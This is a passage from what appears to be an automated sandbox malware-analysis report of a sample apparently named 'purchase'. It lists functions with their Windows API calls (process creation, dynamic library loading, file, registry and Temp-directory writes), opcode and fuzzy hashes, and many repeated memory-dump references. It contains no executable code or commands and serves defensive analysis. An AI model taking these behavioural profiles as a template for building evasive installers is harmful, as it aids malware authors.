                                          • Associated: 00000000.00000002.1473857959.0000000000432000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1473857959.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1473857959.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1473857959.000000000044A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1474076538.000000000044D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_purchase.jbxd
                                          Similarity
                                          • API ID: Window$EnableShow
                                          • String ID:
                                          • API String ID: 1136574915-0
                                          • Opcode ID: f524000984b40da921d67aceb392e6b1a27f4445b9fdd89c88039cce022366aa
                                          • Instruction ID: cc057469d20fee5af05168c8280afa7b014ceb16d0f4b1b408cb009327ac905f
                                          • Opcode Fuzzy Hash: f524000984b40da921d67aceb392e6b1a27f4445b9fdd89c88039cce022366aa
                                          • Instruction Fuzzy Hash: 7BE04876908610DFE754EBA4AE495EE73B4EF80365B10097FE001F11D1D7B94D00975D
                                          Function 00405B24 Relevance: 3.0, APIs: 2, Instructions: 24processCOMMON
                                          Download Yara Rule
                                          APIs
                                          • CreateProcessW.KERNELBASE(00000000,0042C800,00000000,00000000,00000000,04000000,00000000,00000000,00425F10,?,?,?,0042C800,?), ref: 00405B4D
                                          • CloseHandle.KERNEL32(?,?,?,0042C800,?), ref: 00405B5A
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1473809836.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.1473750419.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1473836494.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1473857959.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1473857959.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1473857959.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1473857959.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1473857959.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1473857959.0000000000432000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1473857959.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1473857959.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1473857959.000000000044A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1474076538.000000000044D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_purchase.jbxd
                                          Similarity
                                          • API ID: CloseCreateHandleProcess
                                          • String ID:
                                          • API String ID: 3712363035-0
                                          • Opcode ID: ab728716b39bc4ae5022fc4c28ab15e9e5542c8e0cf41f1555c5a84b4fa30c9d
                                          • Instruction ID: 3e6b85693243cf5959e47e0a5ce0ecee53803ede082a99688cf67a66356fc275
                                          • Opcode Fuzzy Hash: ab728716b39bc4ae5022fc4c28ab15e9e5542c8e0cf41f1555c5a84b4fa30c9d
                                          • Instruction Fuzzy Hash: 3AE0BFB4A10219BFFB10AB64ED05F7B77BCF704604F418825BD10F2551D774A9148A7C
                                          Function 00401598 Relevance: 3.0, APIs: 2, Instructions: 23COMMON
                                          Download Yara Rule
                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1473809836.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.1473750419.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1473836494.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1473857959.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1473857959.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1473857959.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1473857959.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1473857959.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1473857959.0000000000432000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1473857959.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1473857959.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1473857959.000000000044A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1474076538.000000000044D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_purchase.jbxd
                                          Similarity
                                          • API ID: ShowWindow
                                          • String ID:
                                          • API String ID: 1268545403-0
                                          • Opcode ID: cab2a2c0edfac892ff3ce5f7d86d0a7ecd7f2e6ddf1a0654be13e65ecb3d048e
                                          • Instruction ID: ad827bfb45cde9ed8aa1bf7c1acfcc20c377366860c5f8f00bfddef7402fec92
                                          • Opcode Fuzzy Hash: cab2a2c0edfac892ff3ce5f7d86d0a7ecd7f2e6ddf1a0654be13e65ecb3d048e
                                          • Instruction Fuzzy Hash: 52E04F72B11114ABCB18CBA8EDD086E73B6AB54310350453FD502B36A4CA759C418B58
                                          Function 00406935 Relevance: 3.0, APIs: 2, Instructions: 22libraryloaderCOMMON
                                          Download Yara Rule
                                          APIs
                                          • GetModuleHandleA.KERNEL32(?,00000020,?,0040362C,0000000C,?,?,?,?,?,?,?,?), ref: 00406947
                                          • GetProcAddress.KERNEL32(00000000,?), ref: 00406962
                                            • Part of subcall function 004068C5: GetSystemDirectoryW.KERNEL32(?,00000104), ref: 004068DC
                                            • Part of subcall function 004068C5: wsprintfW.USER32 ref: 00406917
                                            • Part of subcall function 004068C5: LoadLibraryExW.KERNEL32(?,00000000,00000008), ref: 0040692B
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1473809836.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.1473750419.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1473836494.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1473857959.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1473857959.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1473857959.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1473857959.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1473857959.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1473857959.0000000000432000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1473857959.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1473857959.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1473857959.000000000044A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1474076538.000000000044D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_purchase.jbxd
                                          Similarity
                                          • API ID: AddressDirectoryHandleLibraryLoadModuleProcSystemwsprintf
                                          • String ID:
                                          • API String ID: 2547128583-0
                                          • Opcode ID: 38b25401b771ecf209a524bd0999a173af8b0ad39984603ae0a2953bb283c85e
                                          • Instruction ID: 5f896a6f513cb693e05c26686958cbb9026995673407ad46a654cc37c4de4e39
                                          • Opcode Fuzzy Hash: 38b25401b771ecf209a524bd0999a173af8b0ad39984603ae0a2953bb283c85e
                                          • Instruction Fuzzy Hash: BCE0CD73604310EBD61067755D0493773E89F85B50302483EF947F2140D734DC32A7AA
                                          Function 00406031 Relevance: 3.0, APIs: 2, Instructions: 16fileCOMMON
                                          Download Yara Rule
                                          APIs
                                          • GetFileAttributesW.KERNELBASE(00000003,004030E2,00437800,80000000,00000003), ref: 00406035
                                          • CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000), ref: 00406057
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1473809836.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.1473750419.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1473836494.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1473857959.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1473857959.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1473857959.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1473857959.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1473857959.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1473857959.0000000000432000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1473857959.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1473857959.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1473857959.000000000044A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1474076538.000000000044D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_purchase.jbxd
                                          Similarity
                                          • API ID: File$AttributesCreate
                                          • String ID:
                                          • API String ID: 415043291-0
                                          • Opcode ID: 6be4d53c09d0ea7202590e2ef391dde9d68f005235e9a58d36352f422cb06a2c
                                          • Instruction ID: 9d50a09f5748d4f60ef03139cc16a9656d1073ae209d3065c053d14625e31d4c
                                          • Opcode Fuzzy Hash: 6be4d53c09d0ea7202590e2ef391dde9d68f005235e9a58d36352f422cb06a2c
                                          • Instruction Fuzzy Hash: 87D09E31654301AFEF098F20DE16F2EBAA2EB84B00F11552CB682941E0DA715819DB15
                                          Function 0040600C Relevance: 3.0, APIs: 2, Instructions: 13COMMON
                                          Download Yara Rule
                                          APIs
                                          • GetFileAttributesW.KERNELBASE(?,?,00405C11,?,?,00000000,00405DE7,?,?,?,?), ref: 00406011
                                          • SetFileAttributesW.KERNEL32(?,00000000), ref: 00406025
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1473809836.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.1473750419.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1473836494.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1473857959.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1473857959.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1473857959.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1473857959.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1473857959.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1473857959.0000000000432000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1473857959.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1473857959.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1473857959.000000000044A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1474076538.000000000044D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_purchase.jbxd
                                          Similarity
                                          • API ID: AttributesFile
                                          • String ID:
                                          • API String ID: 3188754299-0
                                          • Opcode ID: bc30e5c928ed30f9cb3e730bb3a024ff28878b527ec9bdb2640fa07c227b463d
                                          • Instruction ID: fbd6844141adfc982ff7d741096df028d7bbee698e850df9006aa2ae5f51d9dd
                                          • Opcode Fuzzy Hash: bc30e5c928ed30f9cb3e730bb3a024ff28878b527ec9bdb2640fa07c227b463d
                                          • Instruction Fuzzy Hash: 24D0C972504221AFC2103728EE0889BBF55DB542717028A35F8A9A22B0CB304C668694
                                          Function 00405AEF Relevance: 3.0, APIs: 2, Instructions: 9COMMON
                                          Download Yara Rule
                                          APIs
                                          • CreateDirectoryW.KERNELBASE(?,00000000,0040350F,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403806,?,00000008,0000000A,0000000C), ref: 00405AF5
                                          • GetLastError.KERNEL32(?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 00405B03
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1473809836.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.1473750419.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1473836494.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1473857959.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1473857959.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1473857959.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1473857959.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1473857959.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1473857959.0000000000432000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1473857959.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1473857959.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1473857959.000000000044A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1474076538.000000000044D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_purchase.jbxd
                                          Similarity
                                          • API ID: CreateDirectoryErrorLast
                                          • String ID:
                                          • API String ID: 1375471231-0
                                          • Opcode ID: 7ce514c051633c67dabed91c1ba2c830ad6f4192d7236d4c27a26ed09d9cb01d
                                          • Instruction ID: c3646108da72950d5b730f2af08982bf7448ccd78712563759f5c9f930c8cbe9
                                          • Opcode Fuzzy Hash: 7ce514c051633c67dabed91c1ba2c830ad6f4192d7236d4c27a26ed09d9cb01d
                                          • Instruction Fuzzy Hash: 11C04C70244906DAD6509B219F0C71779A0EB50781F195839A586E50A0DA34B455D92D
                                          Function 004063DC Relevance: 1.5, APIs: 1, Instructions: 24registryCOMMON
                                          Download Yara Rule
                                          APIs
                                          • RegCreateKeyExW.KERNELBASE(00000000,?,00000000,00000000,00000000,?,00000000,?,00000000,?,?,?,00402E7C,00000000,?,?), ref: 00406405
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1473809836.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.1473750419.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1473836494.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1473857959.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1473857959.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1473857959.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1473857959.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1473857959.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1473857959.0000000000432000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1473857959.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1473857959.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1473857959.000000000044A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1474076538.000000000044D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_purchase.jbxd
                                          Similarity
                                          • API ID: Create
                                          • String ID:
                                          • API String ID: 2289755597-0
                                          • Opcode ID: b17b4e85cc10dff7c00d1995fa2300a068af545831f113dbcef6cd8b4d780b07
                                          • Instruction ID: 15c5175e75f921513b7f3d75ccef30e451623c4c54541e9d5ee9eac1385433f3
                                          • Opcode Fuzzy Hash: b17b4e85cc10dff7c00d1995fa2300a068af545831f113dbcef6cd8b4d780b07
                                          • Instruction Fuzzy Hash: 1DE0E6B2010109BFEF195F50DD0AD7B371DEB04310F01492EFE16D4051E6B5E9306674
                                          Function 004060E3 Relevance: 1.5, APIs: 1, Instructions: 22fileCOMMON
                                          Download Yara Rule
                                          APIs
                                          • WriteFile.KERNELBASE(00000000,00000000,00000004,00000004,00000000,?,?,0040349F,00000000,00414EC0,?,00414EC0,?,000000FF,00000004,00000000), ref: 004060F7
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1473809836.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.1473750419.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1473836494.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1473857959.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1473857959.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1473857959.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1473857959.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1473857959.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1473857959.0000000000432000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1473857959.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1473857959.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1473857959.000000000044A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1474076538.000000000044D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_purchase.jbxd
                                          Similarity
                                          • API ID: FileWrite
                                          • String ID:
                                          • API String ID: 3934441357-0
                                          • Opcode ID: 4494c28c6fc58b77f7b94402ffbb10e79d92760fb9961e7d9dbcb201027e3d13
                                          • Instruction ID: b9d802e93a63440494d75fc60edee4ff4d41d1542efeb3ab79d4fb436c6ecda5
                                          • Opcode Fuzzy Hash: 4494c28c6fc58b77f7b94402ffbb10e79d92760fb9961e7d9dbcb201027e3d13
                                          • Instruction Fuzzy Hash: 91E08C3220422AABEF109E909C04EEB3B6CEB003A0F014432FD26E6050D271E9319BA4
                                          Function 004060B4 Relevance: 1.5, APIs: 1, Instructions: 22fileCOMMON
                                          Download Yara Rule
                                          APIs
                                          • ReadFile.KERNELBASE(00000000,00000000,00000004,00000004,00000000,000000FF,?,004034D1,00000000,00000000,00403328,000000FF,00000004,00000000,00000000,00000000), ref: 004060C8
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1473809836.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.1473750419.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1473836494.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1473857959.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1473857959.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1473857959.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1473857959.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1473857959.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1473857959.0000000000432000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1473857959.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1473857959.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1473857959.000000000044A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1474076538.000000000044D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_purchase.jbxd
                                          Similarity
                                          • API ID: FileRead
                                          • String ID:
                                          • API String ID: 2738559852-0
                                          • Opcode ID: 076a4193e787d8b2f8fcded04b516b0b1a94860d7d4352c54bed072072f3bbd3
                                          • Instruction ID: 0a9ed9335d9fcbf33a9b7557f86da276afb46ac39f2db62fb679b5cfb923300a
                                          • Opcode Fuzzy Hash: 076a4193e787d8b2f8fcded04b516b0b1a94860d7d4352c54bed072072f3bbd3
                                          • Instruction Fuzzy Hash: C1E0BF32250269ABDF109E559C00AAB775CEB05251F014436B955E7150D671E92197A4
                                          Function 004015C8 Relevance: 1.5, APIs: 1, Instructions: 18COMMON
                                          Download Yara Rule
                                          APIs
                                          • SetFileAttributesW.KERNELBASE(00000000,?,000000F0), ref: 004015D3
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1473809836.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.1473750419.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1473836494.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1473857959.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1473857959.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1473857959.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1473857959.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1473857959.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1473857959.0000000000432000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1473857959.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1473857959.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1473857959.000000000044A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1474076538.000000000044D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_purchase.jbxd
                                          Similarity
                                          • API ID: AttributesFile
                                          • String ID:
                                          • API String ID: 3188754299-0
                                          • Opcode ID: 478cb40ad17b728b10cdbf16e79a2720acc2e44bc9a29048479925e3e1a41e6f
                                          • Instruction ID: f0c310d3f6fffa79c82dab7da22db7b00a6fee7441536bfeb36ed7c6a7bf75c0
                                          • Opcode Fuzzy Hash: 478cb40ad17b728b10cdbf16e79a2720acc2e44bc9a29048479925e3e1a41e6f
                                          • Instruction Fuzzy Hash: 94D05B72B08201DBDB00DBE89B48A9F77709B10368F30853BD111F11D4D6B9C945A71D
                                          Function 0040450C Relevance: 1.5, APIs: 1, Instructions: 9windowCOMMON
                                          Download Yara Rule
                                          APIs
                                          • SendMessageW.USER32(?,00000000,00000000,00000000), ref: 0040451E
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1473809836.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.1473750419.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1473836494.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1473857959.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1473857959.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1473857959.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1473857959.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1473857959.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1473857959.0000000000432000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1473857959.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1473857959.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1473857959.000000000044A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1474076538.000000000044D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_purchase.jbxd
                                          Similarity
                                          • API ID: MessageSend
                                          • String ID:
                                          • API String ID: 3850602802-0
                                          • Opcode ID: c543a5305144ba01004fe0d35289a86565b01ad173ebec7ef44f324a9b2ac024
                                          • Instruction ID: 43b4292f00af6435b8222dbb4ed8e84b3d95e84959177ba0714352b3dfcaa9b9
                                          • Opcode Fuzzy Hash: c543a5305144ba01004fe0d35289a86565b01ad173ebec7ef44f324a9b2ac024
                                          • Instruction Fuzzy Hash: 40C09BF17413017BDA209B509E45F1777989795701F15453D7350F50E0CBB4E450D61D
                                          Function 004034D4 Relevance: 1.5, APIs: 1, Instructions: 6COMMON
                                          Download Yara Rule
                                          APIs
                                          • SetFilePointer.KERNELBASE(00000000,00000000,00000000,00403267,?), ref: 004034E2
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1473809836.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.1473750419.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1473836494.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1473857959.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1473857959.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1473857959.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1473857959.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1473857959.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1473857959.0000000000432000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1473857959.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1473857959.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1473857959.000000000044A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1474076538.000000000044D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
